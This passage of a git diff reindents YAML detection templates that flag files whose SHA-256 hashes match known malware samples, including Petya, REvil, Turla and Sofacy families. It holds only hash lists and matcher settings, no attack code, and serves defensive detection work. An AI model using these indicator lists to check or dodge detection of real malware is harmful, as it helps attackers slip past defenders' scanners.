'c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da'" + - "sha256(raw) == '57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4'" + - "sha256(raw) == '1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1'" + - "sha256(raw) == '9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777'" + - "sha256(raw) == '0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e'" + - "sha256(raw) == '4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281'" + - "sha256(raw) == '4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353'" + - "sha256(raw) == 'c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51'" + - "sha256(raw) == 'f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2'" + - "sha256(raw) == '0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39'" + - "sha256(raw) == 'd874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d'" + - "sha256(raw) == '8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9'" + - "sha256(raw) == '55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579'" + - "sha256(raw) == '528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b'" + - "sha256(raw) == '93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0'" + - "sha256(raw) == 'e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa'" + - "sha256(raw) == '9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471'" + - "sha256(raw) == 'a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064'" + - "sha256(raw) == '3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff'" + - "sha256(raw) == '3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4'" + - "sha256(raw) == 'f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e'" + condition: or diff --git a/file/malware/hash/passcv-ntscan-malware-hash.yaml b/file/malware/hash/passcv-ntscan-malware-hash.yaml index 3a03868558..9fbb090bde 100644 --- a/file/malware/hash/passcv-ntscan-malware-hash.yaml +++ b/file/malware/hash/passcv-ntscan-malware-hash.yaml @@ -10,10 +10,10 @@ info: tags: malware,passcv file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665'" + - type: dsl + dsl: + - "sha256(raw) == '0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665'" diff --git a/file/malware/hash/passcv-sabre-malware-hash.yaml b/file/malware/hash/passcv-sabre-malware-hash.yaml index f3baf97e41..9a3a004ed8 100644 --- a/file/malware/hash/passcv-sabre-malware-hash.yaml +++ b/file/malware/hash/passcv-sabre-malware-hash.yaml @@ -11,19 +11,19 @@ info: tags: malware,passcv file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a'" - - "sha256(raw) == 'e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55'" - - "sha256(raw) == '475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4'" - - "sha256(raw) == '009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78'" - - "sha256(raw) == '92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b'" - - "sha256(raw) == '0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2'" - - "sha256(raw) == '28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1'" - - "sha256(raw) == '27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f'" - - "sha256(raw) == '03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a'" + - "sha256(raw) == 'e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55'" + - "sha256(raw) == '475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4'" + - "sha256(raw) == '009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78'" + - "sha256(raw) == '92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b'" + - "sha256(raw) == '0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2'" + - "sha256(raw) == '28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1'" + - "sha256(raw) == '27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f'" + - "sha256(raw) == '03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5'" + condition: or diff --git a/file/malware/hash/passcv-signingcert-malware-hash.yaml b/file/malware/hash/passcv-signingcert-malware-hash.yaml index d2f38966aa..29dd4de59e 100644 --- a/file/malware/hash/passcv-signingcert-malware-hash.yaml +++ b/file/malware/hash/passcv-signingcert-malware-hash.yaml @@ -11,10 +11,10 @@ info: tags: malware,passcv file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" \ No newline at end of file diff --git a/file/malware/hash/petya-ransomware-hash.yaml b/file/malware/hash/petya-ransomware-hash.yaml index a4ced71871..c365c43943 100644 --- a/file/malware/hash/petya-ransomware-hash.yaml +++ b/file/malware/hash/petya-ransomware-hash.yaml @@ -10,10 +10,10 @@ info: tags: ransomware,malware file: - extensions: + - extensions: - all matchers: - type: dsl - dsl: - - "sha256(raw) == '26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739'" + - type: dsl + dsl: + - "sha256(raw) == '26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739'" diff --git a/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml b/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml index 8f0f4d8467..218921c76b 100644 --- a/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml +++ b/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml @@ -10,18 +10,18 @@ info: tags: malware,poseidon file: - extensions: - - doc - - docx + - extensions: + - doc + - docx matchers: - type: dsl - dsl: - - "sha256(raw) == '3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c'" - - "sha256(raw) == '1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af'" - - "sha256(raw) == 'f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a'" - - "sha256(raw) == 'ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed'" - - "sha256(raw) == '27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778'" - - "sha256(raw) == '1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216'" - - "sha256(raw) == '0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c'" + - "sha256(raw) == '1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af'" + - "sha256(raw) == 'f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a'" + - "sha256(raw) == 'ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed'" + - "sha256(raw) == '27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778'" + - "sha256(raw) == '1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216'" + - "sha256(raw) == '0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b'" + condition: or diff --git a/file/malware/hash/poseidongroup-malware-hash.yaml b/file/malware/hash/poseidongroup-malware-hash.yaml index 8a13db558d..c35c402241 100644 --- a/file/malware/hash/poseidongroup-malware-hash.yaml +++ b/file/malware/hash/poseidongroup-malware-hash.yaml @@ -10,17 +10,17 @@ info: tags: malware file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4'" - - "sha256(raw) == '344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3'" - - "sha256(raw) == '432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61'" - - "sha256(raw) == '8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47'" - - "sha256(raw) == 'd090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f'" - - "sha256(raw) == 'd7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb'" - - "sha256(raw) == 'ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4'" + - "sha256(raw) == '344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3'" + - "sha256(raw) == '432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61'" + - "sha256(raw) == '8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47'" + - "sha256(raw) == 'd090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f'" + - "sha256(raw) == 'd7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb'" + - "sha256(raw) == 'ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3'" + condition: or diff --git a/file/malware/hash/purplewave-malware-hash.yaml b/file/malware/hash/purplewave-malware-hash.yaml index 8492e1a9c7..6ee8e00cd5 100644 --- a/file/malware/hash/purplewave-malware-hash.yaml +++ b/file/malware/hash/purplewave-malware-hash.yaml @@ -9,19 +9,19 @@ info: tags: malware,apt,purplewave file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '7de7b866c46f34be28f7085fb1a1727ab939d65abd3128871fb68c42371af2df'" - - "sha256(raw) == '76bffcf04104a1c4e6a5792d3795d1a03c7497a274042889b8f44c8f8facc304'" - - "sha256(raw) == '832d667b00c07424f050f84e717f8db22833b1e8e131aa7a33de739c4f4b4cdd'" - - "sha256(raw) == '917057a6a03252bc2525b326a63111fce050fc86e6e3b26fa9e452489f1358b9'" - - "sha256(raw) == 'a8577e1ccad877ae5ff4bf89aa578989404643c6fdf10baafd4335a1766abb16'" - - "sha256(raw) == 'd5ec98c98a8f56fdeb00cc2404c4527a39726bf43d8b9cf6c4c8c36364f94161'" - - "sha256(raw) == 'd820ec7f9196a5cc3dbc2b5860334a2e174fede80efc3b8463756fb8767dddf9'" - - "sha256(raw) == 'd4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554'" - - "sha256(raw) == '4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '7de7b866c46f34be28f7085fb1a1727ab939d65abd3128871fb68c42371af2df'" + - "sha256(raw) == '76bffcf04104a1c4e6a5792d3795d1a03c7497a274042889b8f44c8f8facc304'" + - "sha256(raw) == '832d667b00c07424f050f84e717f8db22833b1e8e131aa7a33de739c4f4b4cdd'" + - "sha256(raw) == '917057a6a03252bc2525b326a63111fce050fc86e6e3b26fa9e452489f1358b9'" + - "sha256(raw) == 'a8577e1ccad877ae5ff4bf89aa578989404643c6fdf10baafd4335a1766abb16'" + - "sha256(raw) == 'd5ec98c98a8f56fdeb00cc2404c4527a39726bf43d8b9cf6c4c8c36364f94161'" + - "sha256(raw) == 'd820ec7f9196a5cc3dbc2b5860334a2e174fede80efc3b8463756fb8767dddf9'" + - "sha256(raw) == 'd4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554'" + - "sha256(raw) == '4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d'" + condition: or diff --git a/file/malware/hash/red-leaves-malware-hash.yaml b/file/malware/hash/red-leaves-malware-hash.yaml index 06a4716156..6a5eef6859 100644 --- a/file/malware/hash/red-leaves-malware-hash.yaml +++ b/file/malware/hash/red-leaves-malware-hash.yaml @@ -11,10 +11,10 @@ info: tags: malware,apt,red-leaves file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" \ No newline at end of file diff --git a/file/malware/hash/revil-ransomware-hash.yaml b/file/malware/hash/revil-ransomware-hash.yaml index 61adf28cd9..2e441956a5 100644 --- a/file/malware/hash/revil-ransomware-hash.yaml +++ b/file/malware/hash/revil-ransomware-hash.yaml @@ -11,12 +11,13 @@ info: tags: ransomware,malware file: - extensions: - - all + - extensions: + - all + matchers: - type: dsl - dsl: - - "sha256(raw) == 'f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5'" - - "sha256(raw) == '559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7'" - - "sha256(raw) == 'ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5'" + - "sha256(raw) == '559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7'" + - "sha256(raw) == 'ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4'" + condition: or diff --git a/file/malware/hash/rokrat-malware-hash.yaml b/file/malware/hash/rokrat-malware-hash.yaml index e87b5e645e..f28b8b56a2 100644 --- a/file/malware/hash/rokrat-malware-hash.yaml +++ b/file/malware/hash/rokrat-malware-hash.yaml @@ -11,10 +11,10 @@ info: tags: malware,taudprkapt file: - extensions: + - extensions: - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd'" \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == 'e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd'" \ No newline at end of file diff --git a/file/malware/hash/sauron-malware-hash.yaml b/file/malware/hash/sauron-malware-hash.yaml index 971ab64786..5f5b46eeb3 100644 --- a/file/malware/hash/sauron-malware-hash.yaml +++ b/file/malware/hash/sauron-malware-hash.yaml @@ -10,17 +10,17 @@ info: tags: malware,apt,sauron file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9'" - - "sha256(raw) == '30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8'" - - "sha256(raw) == 'a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec'" - - "sha256(raw) == 'e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57'" - - "sha256(raw) == '3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8'" - - "sha256(raw) == '7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca'" - - "sha256(raw) == '6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9'" + - "sha256(raw) == '30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8'" + - "sha256(raw) == 'a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec'" + - "sha256(raw) == 'e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57'" + - "sha256(raw) == '3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8'" + - "sha256(raw) == '7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca'" + - "sha256(raw) == '6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd'" + condition: or diff --git a/file/malware/hash/seaduke-malware-hash.yaml b/file/malware/hash/seaduke-malware-hash.yaml index 42ed6c7871..4b7f2f119e 100644 --- a/file/malware/hash/seaduke-malware-hash.yaml +++ b/file/malware/hash/seaduke-malware-hash.yaml @@ -9,10 +9,10 @@ info: tags: malware,seaduke file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" \ No newline at end of file diff --git a/file/malware/hash/sfx1-malware-hash.yaml b/file/malware/hash/sfx1-malware-hash.yaml index 7158918abc..c763fff943 100644 --- a/file/malware/hash/sfx1-malware-hash.yaml +++ b/file/malware/hash/sfx1-malware-hash.yaml @@ -10,12 +10,12 @@ info: tags: malware,sfx1 file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f'" - - "sha256(raw) == '502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f'" + - "sha256(raw) == '502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d'" + condition: or diff --git a/file/malware/hash/sfxrar-acrotray-malware-hash.yaml b/file/malware/hash/sfxrar-acrotray-malware-hash.yaml index ea95e45d7a..c0d5f62dd4 100644 --- a/file/malware/hash/sfxrar-acrotray-malware-hash.yaml +++ b/file/malware/hash/sfxrar-acrotray-malware-hash.yaml @@ -9,13 +9,13 @@ info: tags: malware,apt,sfx file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57'" - - "sha256(raw) == '5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48'" - - "sha256(raw) == '56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198'" - condition: or \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57'" + - "sha256(raw) == '5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48'" + - "sha256(raw) == '56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/sofacy-Winexe-malware-hash.yaml b/file/malware/hash/sofacy-Winexe-malware-hash.yaml index 90dd6d8329..0306f2f9de 100644 --- a/file/malware/hash/sofacy-Winexe-malware-hash.yaml +++ b/file/malware/hash/sofacy-Winexe-malware-hash.yaml @@ -11,10 +11,10 @@ info: tags: malware,sofacy file: - extensions: - - exe + - extensions: + - exe matchers: - type: dsl - dsl: - - "sha256(raw) == '5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d'" + - type: dsl + dsl: + - "sha256(raw) == '5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d'" diff --git a/file/malware/hash/sofacy-bundestag-malware-hash.yaml b/file/malware/hash/sofacy-bundestag-malware-hash.yaml index 7d27e960c4..40d4c6ae20 100644 --- a/file/malware/hash/sofacy-bundestag-malware-hash.yaml +++ b/file/malware/hash/sofacy-bundestag-malware-hash.yaml @@ -11,12 +11,12 @@ info: tags: malware,sofacy file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092'" - - "sha256(raw) == '5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092'" + - "sha256(raw) == '5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1'" + condition: or diff --git a/file/malware/hash/sofacy-fybis-malware-hash.yaml b/file/malware/hash/sofacy-fybis-malware-hash.yaml index a285d60b0c..bce5e40be5 100644 --- a/file/malware/hash/sofacy-fybis-malware-hash.yaml +++ b/file/malware/hash/sofacy-fybis-malware-hash.yaml @@ -9,13 +9,13 @@ info: tags: malware,sofacy file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592'" - - "sha256(raw) == '8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb'" - - "sha256(raw) == 'fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592'" + - "sha256(raw) == '8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb'" + - "sha256(raw) == 'fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61'" + condition: or diff --git a/file/malware/hash/tidepool-malware-hash.yaml b/file/malware/hash/tidepool-malware-hash.yaml index 7346f6a7a4..8cf1c20e7f 100644 --- a/file/malware/hash/tidepool-malware-hash.yaml +++ b/file/malware/hash/tidepool-malware-hash.yaml @@ -11,14 +11,14 @@ info: tags: malware,tidepool file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba'" - - "sha256(raw) == '67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed'" - - "sha256(raw) == '2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18'" - - "sha256(raw) == '38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba'" + - "sha256(raw) == '67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed'" + - "sha256(raw) == '2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18'" + - "sha256(raw) == '38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f'" + condition: or diff --git a/file/malware/hash/turla-malware-hash.yaml b/file/malware/hash/turla-malware-hash.yaml index de64dd35bc..831b2188c4 100644 --- a/file/malware/hash/turla-malware-hash.yaml +++ b/file/malware/hash/turla-malware-hash.yaml @@ -10,20 +10,20 @@ info: tags: malware,turla,apt,ruag file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4'" - - "sha256(raw) == '7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9'" - - "sha256(raw) == 'fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd'" - - "sha256(raw) == 'c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4'" - - "sha256(raw) == 'b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4'" - - "sha256(raw) == 'edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348'" - - "sha256(raw) == '8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a'" - - "sha256(raw) == '8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98'" - - "sha256(raw) == '0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f'" - - "sha256(raw) == '2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2'" - condition: or \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4'" + - "sha256(raw) == '7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9'" + - "sha256(raw) == 'fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd'" + - "sha256(raw) == 'c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4'" + - "sha256(raw) == 'b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4'" + - "sha256(raw) == 'edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348'" + - "sha256(raw) == '8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a'" + - "sha256(raw) == '8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98'" + - "sha256(raw) == '0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f'" + - "sha256(raw) == '2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/unit78020-malware-hash.yaml b/file/malware/hash/unit78020-malware-hash.yaml index 3f1812b208..a380d5a7d9 100644 --- a/file/malware/hash/unit78020-malware-hash.yaml +++ b/file/malware/hash/unit78020-malware-hash.yaml @@ -11,16 +11,16 @@ info: tags: malware,unit78020 file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72'" - - "sha256(raw) == '76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd'" - - "sha256(raw) == '2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac'" - - "sha256(raw) == '5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2'" - - "sha256(raw) == '7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af'" - - "sha256(raw) == '88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72'" + - "sha256(raw) == '76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd'" + - "sha256(raw) == '2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac'" + - "sha256(raw) == '5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2'" + - "sha256(raw) == '7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af'" + - "sha256(raw) == '88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790'" + condition: or diff --git a/file/malware/hash/wildneutron-malware-hash.yaml b/file/malware/hash/wildneutron-malware-hash.yaml index 1c1a5cfd67..ef44dc7f11 100644 --- a/file/malware/hash/wildneutron-malware-hash.yaml +++ b/file/malware/hash/wildneutron-malware-hash.yaml @@ -11,21 +11,21 @@ info: tags: malware,wildneutron,apt file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94'" - - "sha256(raw) == 'c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0'" - - "sha256(raw) == 'b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45'" - - "sha256(raw) == '1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206'" - - "sha256(raw) == 